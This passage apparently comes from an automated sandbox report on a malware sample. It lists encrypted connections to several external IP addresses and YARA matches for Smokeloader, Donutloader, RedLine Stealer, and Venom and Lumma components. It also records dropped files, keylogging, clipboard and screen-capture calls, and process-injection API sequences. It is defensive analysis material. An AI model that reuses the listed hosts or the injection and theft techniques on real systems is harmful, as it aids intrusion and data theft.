                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownHTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.10:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.10:49745 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49746 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49752 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49754 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49753 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49756 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49757 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.10:49759 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49760 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49762 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.10:49763 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49764 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49765 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49766 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49767 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49768 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49771 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49772 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49773 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49774 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49775 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49776 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49777 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49778 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49779 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49780 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49781 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49782 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49783 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49785 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49786 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49787 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49788 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49789 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49790 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49791 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49792 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49793 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49794 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49795 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49796 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49797 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49798 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49800 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49801 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.10:49803 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49804 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49806 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49808 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49809 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49810 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49811 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49812 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49813 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49814 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49816 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49817 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49818 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49819 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49820 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49822 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49824 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49826 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49827 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49828 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49829 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49830 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49831 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49832 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49834 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49835 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49836 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49837 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49838 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49839 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49841 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49842 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49843 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49844 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49845 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49846 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49848 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49849 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49850 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49851 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.10:49852 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.10:49853 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.10:49854 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: 37.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 43.2.vm.exe.28c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 37.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 43.2.vm.exe.28c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vm.exe PID: 392, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vm.exe PID: 5776, type: MEMORYSTR
                  Source: 37.2.vm.exe.4e40000.1.raw.unpack, Keylogger.cs.Net Code: KeyboardLayout
                  Source: 43.2.vm.exe.28c0000.1.raw.unpack, Keylogger.cs.Net Code: KeyboardLayout
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EDED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,31_2_02EDED00
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EDED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,31_2_02EDED00
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EDFB2F GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,31_2_02EDFB2F
                  Source: SciTE.exe.5.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_eca01e57-9

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell

                  System Summary

                  barindex
                  Source: 37.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 43.2.vm.exe.28c0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 37.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 43.2.vm.exe.28c0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000025.00000002.3741871434.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                  Source: 0000002B.00000002.2935972956.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                  Source: 00000026.00000002.2904757056.0000000003870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                  Source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000004.00000002.1462755251.00000000006DE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000010.00000002.1780256705.000000000050D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000026.00000002.2881701412.0000000000060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                  Source: 00000010.00000002.1780382606.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 0000002B.00000002.2872562883.0000000000480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                  Source: venom.zip.32.drZip Entry: runvm.bat
                  Source: lumma.zip.32.drZip Entry: run.bat
                  Source: MyProg.exe.5.drStatic PE information: section name: Y|uR
                  Source: IXDaI.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dllJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dllJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeJump to dropped file
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeMemory allocated: 771E0000 page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeMemory allocated: 771E0000 page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeMemory allocated: 771E0000 page execute and read and write
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_00401538 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401538
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_00402FE9 RtlCreateUserThread,NtTerminateProcess,4_2_00402FE9
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_004014DE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014DE
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_00401496 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401496
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401543
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_00401565 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401565
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_00401579 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401579
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_0040157C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_0040157C
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00401538 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,16_2_00401538
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00402FE9 RtlCreateUserThread,NtTerminateProcess,16_2_00402FE9
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_004014DE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,16_2_004014DE
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00401496 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,16_2_00401496
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,16_2_00401543
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00401565 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,16_2_00401565
